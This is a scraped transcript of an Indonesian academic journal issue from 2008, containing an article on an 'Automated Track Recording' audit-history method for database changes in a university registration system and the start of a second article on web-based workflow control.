vol 1 no 2

Upload: wisnubaldas

Post on 20-Jul-2015

115 views

Category:

Documents


0 download

TRANSCRIPT

ISSN: 1978 - 8282

AUTOMATED TRACK RECORDING SEBAGAI SISTEM PENGAMANAN PADA SISTEM INFORMASIUntung Rahardja 1 Maimunah2 Mita Mulya Permata3 Email : [email protected], [email protected] ABSTRAKSITeknologi informasi bukanlah hal yang baru bagi kita dan hampir seluruh aspek kehidupan manusia saat ini tidak dapat dilepaskan dari teknologi. Namun, sistem informasi yang ada saat ini, walaupun telah diamankan dengan password, tetap saja sering diragukan oleh pengguna perihal lemahnya sistem keamanan. Dalam setiap melakukan penyimpanan atau perubahan data yang ada dalam database, terkadang tidak diketahui kapan perubahan data terjadi dan siapa yang merubahnya sehingga keamanan data dirasakan kurang. Untuk mengatasi permasalahan ini maka dibutuhkannya suatu metodologi yang disebut sistem Automated Track Recording (ATR). Cara kerja dari ATR yaitu begitu user menyimpan dan merubah data maka secara otomatis sistem akan merekam kegiatan yang dilakukan selama kegiatan tersebut berlangsung, seperti siapa dan waktu suatu transaksi terjadi/dirubah/ dibatalkan, kapan/siapa masuk ke komputer, kapan/siapa masuk dalam database, maka yang lama dan yang baru ada semua dalam database. ATR didefinisikan sebagai teknik penyimpanan data yang merekam perubahan data dan waktu, yang dapat dijadikan bahan evaluasi dan pengamanan. Diidentifikasikan lima masalah yang sering dihadapi oleh pengguna sistem informasi dari segi keamanannya, serta empat ciri-ciri khas dari sistem ATR ini. Dengan demikian, ATR bisa dijadikan suatu gambaran seperti sistem history dimana konsep tersebut dapat membantu dalam menggunakan database khususnya dalam menyimpan dan merubah data sehingga user dapat mengetahui kapan terjadi dan siapa merubah. Kata Kunci : Automated Track Recording

PENDAHULUAN Seiring dengan perkembangan di bidang ilmu pengetahuan dan teknologi, dan dorongan atas kebutuhan pemakai ( user) untuk mendapatkan kemudahankemudahan dalam melakukan segala aktivitas untuk mencapai suatu tujuan yang telah

1. Dosen Jurusan Sistem Informasi, STMIK Raharja Jl. Jend Sudirman No.40 Modern Cikokol-Tangerang Telp 5529692 2. Dosen Jurusan Manajemen Informatika, AMIK Raharja Informatika Jl. Jend Sudirman No.40 Modern Cikokol-Tangerang Telp 5529692 3. Mahasiswi Jurusan Sistem Informasi, STMIK Raharja Jl. Jend Sudirman No.40 Modern Cikokol-Tangerang Telp 5529692

Vol.1 No.2 - Januari 2008

103

ISSN: 1978 - 8282 ditetapkan, komputer dijadikan alat yang dapat mengubah sistem kerja, produktivitas kerja dari fungsi-fungsi manajemen dan administrasi dilingkungan perusahaan. Selain itu, tidak hanya dilihat dari segi komputernya saja namun yang lebih penting dalam segi pengelolaan sistem informasinya yang harus diimbangi dengan perhatian yang serius terhadap keamanan sistem informasi (Information System Security). Dimana, keamanan sistem informasi merupakan salah satu yang penting dalam melakukan pengelolaan sistem. Salah satu contoh pengelolaan sistem yaitu sistem yang berhubungan dengan database. Database merupakan kumpulan dari data yang saling berhubungan satu dengan yang lainnya, tersimpan di perangkat keras komputer dan digunakan perangkat lunak untuk memanipulasinya dan juga salah satu komponen yang penting dalam sistem informasi karena merupakan basis dalam menyediakan informasi bagi para pemakai. Selain itu, didalam database terdapat beberapa tipe file yang salah satunya yaitu file sejarah (history file) atau disebut juga dengan file arsip (archival file). File sejarah merupakan file yang berisi data masa lalu yang sudah tidak aktif lagi tetapi masih disimpan sebagai arsip. [Jogi99] Meskipun sudah memiliki file sejarah tetap saja dalam setiap melakukan penyimpanan atau perubahan data yang ada dalam database, terkadang tidak diketahui kapan perubahan data terjadi dan siapa yang merubahnya sehingga keamanan data dirasakan kurang. Misalnya saja perubahan suatu file mahasiswa yang berisi data tentang semua biodata mahasiswa ke dalam suatu database. Untuk mengatasi masalah tersebut maka dibutuhkan suatu sistem dimana sistem tersebut sangatlah penting sehingga kita dapat mengetahui kapan dan siapa yang menyimpan atau merubah data kedalam database dan sistem tersebut dinamakan sebagai Automated Track Recording (ATR).

Gambar 1 Jenjang Data (telah dimodifikasi)

104

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 Dalam permasalahan yang akan dibahas, aspek keamanan (security) merupakan salah satu aspek yang sering dipertanyakan dalam implementasi sebuah sistem informasi. Apalagi kalau sistem yang dikembangkan memiliki data yang bersifat sangat sensitif. Untuk itu masalah keamanan perlu mendapatkan perhatian yang khusus. Salah satu kunci keberhasilan pengamanan sistem informasi adalah adanya visi dan komitmen dari pimpinan puncak. Upaya atau inisiatif pengamanan akan percuma tanpa hal ini. Ketidak-adaan komitmen dari puncak pimpinan berdampak kepada investasi pengamanan data. Pengamanan data tidak dapat tumbuh demikian saja tanpa adanya usaha dan biaya. Sebagai contoh, untuk mengamankan hotel, setiap pintu kamar perlu dilengkapi dengan kunci. Adalah tidak mungkin menganggap bahwa setiap tamu taat kepada aturan bahwa mereka hanya boleh mengakses kamar mereka sendiri. Pemasangan kunci pintu membutuhkan biaya yang tidak sedikit, terlebih lagi jika menggunakan kunci yang canggih. Pengamanan data elektronik juga membutuhkan investasi, dia tidak dapat timbul demikian saja. Tanpa investasi akan sia-sia upaya pengamanan data. Sayangnya hal ini sering diabaikan karena tidak adanya komitmen dari pimpinan puncak.[Raha05] Selain masalah pengguna sistem informasi dari segi keamanannya, dapat dilihat juga masalah dalam penyimpanan ataupun perubahan data dalam database, yaitu: perubahan data pada database umumnya hanya menyimpan data yang dirubah, tanpa dapat diketahui data yang sebelumnya atau kapan dan siapa yang merubahnya.

Penggunaan Perangkat Lunak yang bervariasi

Identitas Pengguna

Kesalahan Konfigurasi

Kesalahan Desain

Belum diketahuiapan dan siapa yang menyimpan atau merubah data dalam database.

Gambar 2 Masalah Pengguna Sistem Informasi dari Segi Keamanannya.

Dari uraian diatas, maka teridentifikasikan lima masalah pengguna sistem informasi dari segi keamanannya yang sering dijumpai yaitu: 1. Penggunaan perangkat lunak yang bervariasi. Penggunaan perangkat lunak yang bervariasi akan lebih membutuhkan waktu dan tenaga yang lebih besar dalam hal ini memonitor isu-isu keamanan, ketimbang sistem yang dibangun oleh perangkat lunak yang relatif homogen sering kali hal ini diperparah dengan adanya suatu standar dan prosedur dalam pemilihan suatu sistem.[Prac04].

Vol.1 No.2 - Januari 2008

105

ISSN: 1978 - 8282 2. Identitas pengguna. Salah satu tujuan dari sistem keamanan adalah memastikan hanya orang yang berhak saja yang dapat akses kesuatu sistem. Dalam identitas pengguna memiliki tantangan yaitu : a. Memetakan otoritas karyawan terhadap sumber-sumber (resources) sistem informasi seperti server, file, database, aplikasi dan sebagainya. Katakan saja ada 1000 karyawan yang mengakses 10 aplikasi/file/database, maka akan ada 10.000 relasi yang harus dipetakan antara karyawan dan sumber sistem informasi tersebut. b. Jika ada perubahan seperti pindahnya karyawan dari suatu bagian ke bagian lain atau jika ada karyawan yang keluar, tentunya sistem tersebut harus dapat dengan cepat memodifikasi/menghapus akses yang diberikan. Kerumitan ini akan lebih besar lagi jika sumber-sumber sistem informasi yang memiliki perusahaan tidak hanya diakses oleh karyawan internal melainkan juga para vendor, mitra kerja dan konsultan baik dari dalam jaringan perusahaan maupun dari luar. 3. Kesalahan konfigurasi terjadi pada tahap operasional. Sistem yang digunakan biasanya harus dikonfigurasi sesuai dengan kebijakan perusahaan. Sebagai contoh, pemilik sistem membuat kebijakan bahwa yang dapat melihat dokumen-dokumen tertentu adalah sebuah unit tertentu. Namun ternyata konfigurasi dari sistem memperkenankan siapa saja mengakses dokumen tersebut. Selain salah konfigurasi, ada juga permasalahan yang disebabkan karena ketidakjelasan atau ketidak-adaan kebijakan (policy) dari pemilik sistem sehingga menyulitkan bagi pengelola untuk melakukan pembatasan.[Raha05] 4. Kesalahan desain. Terjadi pada tahap desain dimana keamanan seringkali diabaikan atau dipikirkan belakangan (after thought). Sebagai contoh ada sebuah sistem informasi yang menganggap bahwa sistem operasi akan aman dan juga jaringan akan aman sehingga tidak ada desain untuk pengamanan data, misalnya dengan menggunakan enkripsi. ditemukannya beberapa sistem seperti ini. Akibatnya ketika sistem operasi dari komputer atau server yang bersangkutan berhasil dijebol, data dapat diakses oleh pihak yang tidak berwenang. Demikian pula ketika jaringan yang digunakan untuk pengiriman data berhasil diakses oleh pihak yang tidak berwenang, maka data akan kelihatan dengan mudah. 5. Kapan dan siapa yang menyimpan atau merubah data dalam database. Dalam setiap menyimpan atau merubah data di database, terkadang tidak diketahui kapan perubahan data terjadi dan siapa yang merubahnya sehingga keamanan data dirasakan kurang. Misalnya saja penyimpanan suatu file mahasiswa yang

106

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 berisi data tentang semua biodata mahasiswa ke dalam suatu database. Kadangkadang karena sistem terlalu kompleks sementara database yang disediakan sangat terbatas maka dimungkinkan adanya kesalahan dalam penyimpanan data dalam database (update). Adapun manfaat yang diharapkan dan diperoleh dari metode ATR ini adalah : 1. Mengetahui seperti waktu suatu transaksi terjadi/dirubah/dibatalkan, kapan masuk ke komputer, kapan masuk dalam database. Maka yang lama dan yang baru ada semua dalam database. 2. Mengetahui seperti siapa yang melakukan /dirubah/dibatalkan, siapa masuk ke komputer, siapa masuk dalam database. Maka siapa yang merubah data lama menjadi data baru ada semua tersimpan dalam database. 3. Memudahkan penelusuran perubahan data yaitu data lama dengan yang baru semua tersimpan dalam satu database. 4. Keamanan (security), memang ada sejumlah sistem (aplikasi) pengelola basis data yang tidak menerapkan aspek keamanan dalam penggunaan basis data. Tetapi untuk sistem yang besar dan serius, aspek keamanan juga dapat diterapkan dengan ketat. Dengan begitu, kita dapat menentukan siapa-siapa (pemakai) yang boleh menggunakan basis data beserta objek-objek di dalamnya dan menentukan jenis-jenis operasi apa saja yang boleh dilakukannya. PEMBAHASAN Sebelum adanya metode ATR, terdapat beberapa metode perubahan data antara lain dengan : 1. Journaling Block Device.[Vlsm06] Sistem berkas berjurnal atau Journaling Filesystem menggunakan jurnal hanya sebagai tempat untuk mencatat semua informasi mengenai transaksi yang dilakukan, sedangkan disk digunakan untuk menyimpan data yang sebenarnya. Jurnal dapat saja berada pada disk yang sama dengan disk yang digunakan untuk penyimpanan data, ataupun berada pada disk yang berbeda. Beberapa sistem berkas dapat memiliki jurnalnya sendiri, tetapi dimungkinkan juga penggunaan satu jurnal bersama (sharing journal) untuk beberapa sistem berkas. Linux Journaling Block Device (JBD) menggunakan suatu catatan (log) untuk mencatat semua operasi yang mengubah konsistensi data (seperti update, write, dan sebagainya) dalam disk. Implementasi struktur data dari jurnal berbentuk seperti circular linked list, jadi jurnal dapat menggunakan ruang tersebut berulang-ulang (jika jurnal telah penuh).

Vol.1 No.2 - Januari 2008

107

ISSN: 1978 - 8282 Akan menjadi tidak efisien jika tiap atomic update ditulis ke jurnal. Untuk menghasilkan performa yang lebih baik, JBD menyatukan sekumpulan atomic update tersebut ke dalam satu transaksi dan menulisnya ke dalam jurnal. JBD memastikan setiap transaksi adalah transaksi yang atomik. Ketika suatu transaksi diproses oleh sistem, transaksi tersebut akan melalui lima state yaitu: a. Running. Transaksi yang sedang berjalan di sistem dan dapat menerima operasi atomic update lain, hanya ada satu transaksi yang dapat berstatus running dalam sistem. Transaksi tidak lagi menerima operasi atomic update, dan belum semua atomic update selesai dilakukan. Semua atomic update yang terdapat dalam suatu transaksi telah selesai, sehingga transaksi dapat ditulis ke jurnal. Sistem akan menulis commit record yang menandakan penulisan ke jurnal telah selesai. Transaksi dan commit record telah selesai ditulis ke jurnal.

b. Locked. c. Flush. d. Commit. e. Finished.

2. Mandatory Access Control (MAC).[Cert07] Mandatory Access Control adalah sebuah teknik yang diimplementasikan oleh role-base security. Pada MAC akses dari object (dalam hal ini database) diciptakan oleh subyek (pemakai/pembuat). Access Control dapat diartikan juga sebagai security dengan jalan membatasi akses subyek terhadap obyek. Subyek harus diberikan hak akses secara jelas tentang operasi apa saja yang mungkin dilakukan. Selain itu juga harus ditentukan syarat (requirement) apa saja yang harus dipenuhi agar dapat mengakses obyek. Sistem yang mengimplementasikan MAC memerlukan label untuk setiap obyek dan subyek, label ini berguna sebagai identitas dari masing-masing subyek dan obyek. Ada beberapa definisi yang perlu ketahui untuk pemahaman MAC ini: Obyek : Entitas pasif, menyimpan informasi Subyek : Entitas aktif, memanipulasi informasi Label : Indentifikasi dari kerahasiaan object Clearance : Menentukan kelas/bagian yang paling rahasia untuk subyek Permission : Menentukan operasi apa saja yang dapat dilakukan obyek terhadap subyek seperti, read, write, append, execute. Dengan adanya berbagai macam metode perubahan data seperti pada gambaran diatas, Automated Track Recording (ATR) bisa dijadikan sebagai solusi yang tepat untuk mengatasi permasalahan didalam penyimpanan dan merubah data dalam database.

108

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 Automated track recording sebagai sistem pengamanan pada sistem informasi yang dibahas pada artikel ini berfungsi untuk menjawab permasalahan didalam penyimpanan dan merubah data dalam database. Jadi konsep ini bisa dijadikan suatu gambaran seperti sistem history dimana konsep tersebut dapat membantu dalam menggunakan database khususnya dalam menyimpan dan merubah data sehingga user dapat mengetahui kapan terjadi dan siapa merubah. Berikut empat ciri khas yang sekaligus merupakan konsep ATR dalam memecahkan lima permasalahan yang sering dihadapi, diantaranya adalah sebagai berikut: 1. ATR dapat mengetahui kapan dan siapa yang menyimpan atau merubah data dalam database (isi data mencakup data saat ini maupun data historis) . 2. ATR memiliki time-variant dimana perubahan terhadap data dalam database direkam sehingga hasil dari perubahan tersebut dapat menampilkan perubahan setiap saat. 3. ATR meningkatkan kemudahan user dalam mengakses data dengan cakupan yang lebih luas. 4. ATR meningkatkan konsistensi data . Begitu user menyimpan dan merubah data maka secara otomatis sistem akan merekam kegiatan yang dilakukan selama kegiatan tersebut berlangsung, seperti siapa dan waktu suatu transaksi terjadi/dirubah/dibatalkan, kapan/siapa masuk ke komputer, kapan/siapa masuk dalam database. Maka yang lama dan yang baru ada semua dalam database. Dalam menjalankan manajemen, sebuah perusahaan atau organisasi membutuhkan informasi yang up-date, baik yang berasal dari jajaran bawah sebagai entry data maupun dari manajemen information system, untuk tingkat pimpinan.[Rhdj06] MERANCANG ALGORITMA ATR Var Char Admin, Data_Original, Data_New, Tgl ; Main () { Up-date Table Sumber_Mahasiswa ( Data_Original, Db, Field, NIM) Insert Into Table History ( Admin, Data_Original, Data_New, Tgl) Selesai }

Vol.1 No.2 - Januari 2008

109

ISSN: 1978 - 8282 MERANCANG APLIKASI DENGAN METODE ATR

Jalankan Aplikasi

Pilih salah satu objek yang ingin dirubah

Database Lama (original)

Masukan data baru (edit)

Klik tombol Up date

Simpan ke database Database Baru (history)

Buka kembali tampilan aplikasi (yang baru)

Gambar 3 Flowchart Aplikasi dengan Metode ATR

Pada rancangan aplikasi dengan metode ATR diatas, yaitu membangun dua buah database, pertama database data lama/original yaitu database yang menyediakan data sebelumnya dan kedua database history digunakan untuk merekam dan menyimpan data secara otomatis kedalam database tersebut, seperti siapa dan waktu suatu transaksi terjadi/dirubah/dibatalkan, kapan/siapa masuk ke komputer, kapan/siapa masuk dalam database. Maka yang lama dan yang baru ada semua dalam database.Tabel 1 Database Tabel History

No 1 2 3 4 5 6

Nama Field Admin Data Baru Data Lama Db Field Tanggal

Data Type nvarchar nvarchar nvarchar nvarchar nvarchar Smalldatetime

Field Size 30 200 200 30 30 16

110

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 APLIKASI ATR. Software yang digunakan untuk membuat program ATR yaitu ASP, karena ASP merupakan suatu framework yang dapat digunakan untuk membuat web dinamis. ASP banyak digunakan untuk aplikasi yang berhubungan dengan database, baik menggunakan Microsoft Access database hingga SQL server atau Oracle database. Scripting yang paling banyak digunakan dalam menulis ASP adalah Vbscript. ASP adalah Macromedia Dreamweaver MX dan databasenya menggunakan program aplikasi Microsoft Access. Untuk mengkoneksikan antara ASP dengan database digunakanlah SQL (Structured Query Language).[Rhdj07] ASP (Active Server Pages) adalah sebuah objek lebih tepatnya component Object Model (COM). Bukan bahasa pemrograman yang sering kita lihat, ASP dikembangkan diatas dasar ISAPI yang terdiri dari 6 object sederhana. Akan tetapi, karena digabungkan dengan struktur teknologi Microsoft lainnya, object ini menjadi sangat berguna. Keenam object tersebut adalah Application , Session, Response, Request, Server, dan ObjectContext [Andi05]. SQL (baca:sequel) adalah kependekan dari Structures Query Languange. Bahasa ini merupakan standar yang digunakan untuk mengakses basis data relational. Saat ini banyak sekali perangkat lunak yang menggunakan SQL sebagai sub bahasa untuk mengakses data. Perangkat lunak ini biasanya disebut RDMS (Relational Database Management System).[Oddi06] Database yang digunakan yaitu SQL Server dimana SQL server didesain untuk dapat digunakan secara client server dalam lingkungan intranet bahkan internet.[Sute06] Dalam pembutan database SQL Server tidak menyediakan kemampuan untuk membuat form, report, dan sebagainya. SQL Server hanya menyediakan database dan pengaturan hak (privillage), security dan semua yang berkaitan dengan manajemen database. Tipe data yang dapat digunakan digunakan dalam SQL Server hamper sama dengan Access tetapi penamaaannya saja yang berbeda, berikut daftar konversi penamaan untuk Access-SQL Server :

Vol.1 No.2 - Januari 2008

111

ISSN: 1978 - 8282Tabel 2 Daftar konversi penamaan untuk Access-SQL Server

Access Yes/No Number (Byte) Number (Integer) Number (Long Integer) Number (Single) Number (Double) Currency Date/Time Autonumber (Counter) Text (n) Memo OLE Object

SQL Server Bit Smallint Smallint Int Real Float Money Datetime Int Varchar (n) Text Image

Selain itu dengan cara On-line, sesuatu dikatakan online adalah bila ia terkoneksi/ terhubung dalam suatu jaringan ataupun sistem yang lebih besar.[Rhdj07] Beberapa arti kata lainnya yang lebih spesifik: 1. Dalam percakapan umum, jaringan/network yang lebih besar dalam konteks ini biasanya lebih mengarah pada Internet, sehingga online lebih pada menjelaskan status bahwa ia dapat diakses melalui internet. 2. Secara lebih spesifik dalam sebuah sistem yang terkait pada ukuran dalam satu aktivitas tertentu, sebuah elemen dari sistem tersebut dikatakan online jika elemen tersebut beroperasional. Sebagai contoh, Sebuah instalasi pembangkit listrik dikatakan online jika ia dapat menyediakan listrik pada jaringan elektrik. 3. Dalam telekomunikasi, Istilah online memiliki arti lain yang lebih spesifik. Suatu alat diasosiasikan dalam sebuah sistem yang lebih besar dikatakan online bila berada dalam kontrol langsung dari sistem tersebut. Dalam arti jika ia tersedia saat akan digunakan oleh sistem (on-demand), tanpa membutuhkan intervensi manusia, namun tidak bisa beroperasi secara mandiri di luar dari sistem tersebut.

112

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 IMPLEMENTASI Automated Track Recording (ATR) yang dibangun dan dibahas pada artikel ini berfungsi untuk memberikan kemudahan user dalam mengakses data dengan cakupan yang lebih luas dan meningkatkan pengamanan data yang ada dalam database. Metode ATR ini telah direalisasikan dalam program untuk digunakan pada bagian Registrasi Perkuliahan dan Ujian (RPU). a. Database Field Dalam Table Admin_RPUTabel 3 Database Field Dalam Table Admin_RPU

Tabel Database diatas, berisi field-field yang berada pada tabel Admin_RPU (user yang bekerja dan mempunyai akses untuk merubah data pada bagian Registrasi Perkuliahan dan Ujian) dimana field-field tersebut terkait dalam pembuatan ATR dengan menggunakan SQL Server. Tabel ini dibuat untuk Divisi RPU dimana divisi tersebut mempunyai hak akses dalam menyimpan atau merubah data dalam database. Selain itu, tabel ini digunakan untuk menyimpan seluruh history transaksi pengubahan/ pengupdate-an data pada tabel Sumber_Mahasiswa pada khususnya.

Vol.1 No.2 - Januari 2008

113

ISSN: 1978 - 8282 b. Record Dalam Field AdminTabel 4 Tabel Record Dalam Field Admin

RECORD DALAM FIELD Admin Rahardja Aisyah Hidayati Tabel diatas berisi field Admin yang record ini digunakan untuk menjamin kerahasiaan serta pengamanan data dan informasi. Maka setiap user (yang mempunyai hak akses terhadap sistem dan akan diberikan password masing-masing yang digunakan untuk melakukan login). Jika user hendak menggunakan maka user diminta untuk mengisi user name (Admin) dan passwordnya terlebih dahulu. Sehingga setiap melakukan penyimpanan atau perubahan data dalam database, sistem dapat mengetahui siapa (Admin) yang merubah atau menyimpan data dalam database. c. Record Field Dalam Table Admin_RPUTabel 5 Tabel Record Field Dalam Table Admin_RPU

114

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 Tabel diatas merupakan isi record dari field NIM, Field, dan Data_Original dari tabel Admin_RPU. Dari record 1 dapat dijelaskan bahwa data mahasiswa yang terdapat pada tabel Sumber_Mahasiswa dengan NIM 0311451509, dengan field Jenis_Kelamin mempunyai Data_Original (data asli sebelum dirubah) yaitu Perempuan. d. Record Field Dalam Table Admin_RPU LanjutanTabel 6 Tabel Record Field Dalam Table Admin_RPU Lanjutan

Tabel ini merupakan lanjutan dari bagian sebelumnya, dimana pada tabel ini hanya berisi record dari field Data_New dan field Tgl. Dapat dijelaskan pula field Data_New berisi data setelah terjadi perubahan berarti Mahasiswa dengan NIM 0311451509, dengan field Jenis_Kel mempunyai Data_Original Perempuan dirubah menjadi Data_New Laki-laki, pada Tanggal 9/3/2007 Jam 9:26:00 AM. Dengan tabel ini maka diketahui kapan dan siapa yang melakukan /dirubah/dibatalkan, siapa masuk ke komputer, siapa masuk dalam database. Maka siapa merubah data lama menjadi data baru ada semua tersimpan dalam database.

Vol.1 No.2 - Januari 2008

115

ISSN: 1978 - 8282 Tampilan Program RPU Tampilan Program (interface) Automated Track Recording (ATR) ini dibuat sesederhana mungkin dengan maksud agar user dapat dengan mudah menggunakan program aplikasi ini. Adapun tampilan tampilan layar ini terdiri dari : Tampilan Login

Gambar 4 Tampilan Login

Untuk masuk kedalam menu pencarian data mahasiswa, Admin_RPU harus melakukan login terlebih dahulu, dimana digunakan untuk menjaga keamanan dari data, setelah melakukan login maka Admin_RPU akan masuk kedalam menu Pencarian data mahasiswa Secara online.

116

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 Tampilan Pencarian Data

Gambar 5 Tampilan Pencarian Data

Pada menu ini berisikan nim, nama mahasiswa, dan status mahasiswa dimana Admin_RPU dapat mengetahui siapa yang ingin dirubah data mahasiswanya. Tampilan Biodata Mahasiswa

Gambar 6 Tampilan Biodata Mahasiswa

Vol.1 No.2 - Januari 2008

117

ISSN: 1978 - 8282

Tampilan diatas, merupakan salah satu biodata mahasiswa yang akan dirubah datanya. Admin_RPU hanya memilih data apa yang akan dirubah disalah satu field data maka akan secara otomatis keluar form up-date untuk merubah datanya. Tampilan Sebelum dan Sesudah Pengup-datean

Gambar 7 Tampilan Sebelum dan Sesudah Pengup-datean

118

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 Dapat dijelaskan bahwa field Biodata yang baru berisi data setelah terjadi perubahan berarti Mahasiswa dengan NIM 0611357615, dengan field Jenis_Kel mempunyai Biodata sebelumnya Perempuan dirubah menjadi Laki-laki setelah melakukan perubahan. Setelah Admin_RPU melakukan perubahan maka semua kegitan perubahan akan tersimpan dalam database. KESIMPULAN Dari uraian tersebut diatas, penulis mengambil kesimpulan bahwa Automated Track Recording (ATR) sebagai sistem pengamanan pada sistem informasi ini sangat cocok untuk dikembangkan baik dilingkungan perguruan tinggi maupun dilingkungan perusahaan. Metode ATR ini memiliki beberapa kelebihan diantaranya : 1) Meningkatkan kemudahan user dalam mengakses data dengan cakupan yang lebih luas (dalam arti kita dapat melihat history data yang pernah dirubah). 2) Meningkatkan konsistensi data 3) Dilakukan secara On-line 4) Mengetahui kapan dan siapa yang menyimpan atau merubah data dalam data base. DAFTAR PUSTAKA 1. Agus, Pracoyo (2004). Arah Perkembangan Teknologi Keamanan Sistem Informasi: Memanfaatkan Kecemasaan Perusahaan. Diakses pada 6 November 2007 dari http:/ /www.ebizzasia.com/0215-2004/column,0215.agus.htm 2. Andi (2005). Aplikasi Web Database ASP Menggunakan Dreamweaver MX 2004, Yogyakarta, Andi Offset. 3. Bernard, R, Suteja (2006). Membuat Aplikasi Web Interaktif Dengan ASP, Bandung, Informatika.181-186 4. Budi, Raharjo (2005). e-PROCUREMENT SECURITY. Bandung: Institut Teknologi Bandung. 5. Hartono, Jogiyanto (1999). Pengenalan Komputer: Dasar Ilmu Komputer, Pemrograman, Sistem Informasi dan Intelegensi Buatan, Edisi ke-3, Yogyakarta, Andi.711-714

Vol.1 No.2 - Januari 2008

119

ISSN: 1978 - 8282 6. Oleh, Soleh, dkk (2006). SQL Sebagai Konsep Pembuatan Sistem Database, Perguruan Tinggi Raharja, Tangerang, 5(3),37 7. Untung, Rahardja, dkk. (2006). Evolusi Interaksi Manusia Dan Komputer Dengan Konsep Intelligen On-Line Transactionsl Processing (IOLTP), Perguruan Tinggi Raharja, Tangerang, 5(3), 2 8. Untung, Rahardja, dkk (2006). Meningkatkan Kualitas Penawaran Dengan Customer Product Technology Interface, Perguruan Tinggi Raharja, Tangerang, 6(3) 9. Untung, Rahardja (2007). Analisis Kelayakan Investasi Digita l Dashboard Pada Manajemen Akademik Perguruan Tinggi Raharja Tinggi: Studi Kasus Pada Perguruan Tinggi Raharja. Thesis. Program Magister Teknologi Informasi. Fakultas Ilmu Komputer. Universitas Indonesia, 16-17 10. Mandatory Access Control pada Sistem Data Base. Diakses pada 17 Desember 2007 dari http://www.cert.or.id/~budi/courses/el695/project/irwan.doc 11. Perancangan Penggunaan Data Warehouse untuk MQ Corporation. Diakses pada 19 November 2007 dari http://www.student.itb.ac.id 12. Sistem Berkas Linux. Diakses pada 18 Desember 2007 dari http://bebas.vlsm.org/ v06/Kuliah/SistemOperasi/BUKU/SistemOperasi-4.X-2/ch21s04.html

120

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282

PENGONTROLAN DAN OTOMATISASI WORKFLOW MENGGUNAKAN COMPANY WIDE WEB (CWW)Untung Rahardja 1 Dina Fitria Murad 2 Valent Setiatmi 3 Email: [email protected],[email protected] ABSTRAKSISelama beberapa waktu dunia bisnis telah berhasil mengatasi persoalan aliran data yang besar dengan mengalihkan pemrosesan rutin dan transaksi bisnis mereka pada sistem informasi berbasis komputer. Namun, adanya perbedaan sistem informasi pada masingmasing bagian seringkali mensyaratkan penterjemahan dari satu sistem ke sistem lain secara manual, yang dapat mengurangi kecepatan dan keandalan proses pertukaran informasi antar bagian dalam perusahaan, serta sulitnya pengontrolan pekerjaan di seluruh bagian perusahaan. Company Wide Web (CWW) muncul sebagai usaha untuk mengatasi masalah ini. CWW didefinisikan sebagai sistem web yang digunakan untuk mengontrol, mengintegrasikan, dan mengotomasikan proses bisnis yang meliputi perpindahan dokumen melalui suatu prosedur kerja secara elektronis ke seluruh bagian perusahaan secara mudah, akurat, efisien, dan konsisten. Dalam artikel ini akan dikemukakan beberapa langkah pemecahan masalah, antara lain: mengidentifikasikan 3 (tiga) masalah yang sering dihadapi perusahaan dalam hal pengontrolan aliran kerja, mendefinisikan konsep baru dan 6 (enam) ciri khas dari CWW, serta menguraikan 7 (tujuh) manfaat dari penerapan CWW, yang pada akhirnya akan dibuktikan melalui implementasi dengan mengambil studi kasus pada Perguruan Tinggi Raharja. Dengan adanya CWW, diharapkan dapat meningkatkan kualitas kecepatan proses dan pertukaran informasi, meningkatkan self monitoring, constant reminding dan early warning bagi karyawan guna meningkatkan kinerja perusahaan, juga lebih efisien dalam melakukan manajemen informasi. Kata kunci: work flow, company wide web

PENDAHULUAN Adanya persaingan yang semakin terbuka dan kompetisi antar organisasi dan perusahaan telah mendorong terjadinya revolusi pada dunia internet. Web mulai dikembangkan dari sebuah bahan marketing yang statik menjadi platform bisnis yang

1. Dosen Jurusan Sistem Informasi, STMIK Raharja Jl. Jend Sudirman No.40 Modern Cikokol-Tangerang Telp 5529692 2. Dosen Jurusan Sistem Informasi, STMIK Raharja Jl. Jend Sudirman No.40 Modern Cikokol-Tangerang Telp 5529692 3. Mahasiswi Jurusan Sistem Informasi, STMIK Raharja Jl. Jend Sudirman No.40 Modern Cikokol-Tangerang Telp 5529692

Vol.1 No.2 - Januari 2008

121

ISSN: 1978 - 8282 dinamis [Ebde06]. Banyak perusahaan pada umumnya maupun Perguruan Tinggi pada khususnya, telah menerapkan prinsip dan gaya kerja web dalam mendukung proses bisnis organisasi. Perguruan tinggi Raharja sebagai kampus unggulan sangat menyadari banyaknya tantangan yang dihadapi dalam mempertahankan dan meningkatkan mutu serta kualitas dari sistem informasi yang ada diantaranya dengan menggunakan CWW sebagai salah satu alat ukur. Dengan menggunakan model analisis Five Competitive Forces dari Porter [Port85] dimana melihat pada 5 faktor kekuatan yang ada, maka akan dapat dilihat posisi organisasi dalam situasi kompetisi saat ini. Kelima faktor kekuatan tersebut adalah: Pendatang Baru (new entrants), Pemasok (supplier), Pengguna Jasa (buyers), Produk Pengganti (substitute products or services), dan Pemerintah (government and stakeholder). Dengan demikian, dapat ditentukan suatu strategi guna meningkatkan kemampuan daya saing yang dimiliki. Sebenarnya telah ada yang menggunakan model analisis tersebut di dalam melihat situasi kompetisi untuk kalangan pendidikan, khususnya Perguruan Tinggi yang dalam hal ini adalah Perguruan Tinggi Raharja.

Gambar 1. Five Competitive Forces dari Porter untuk Kalangan Pendidikan [Raha07]

122

Vol.1 No.2 - Januari 2008

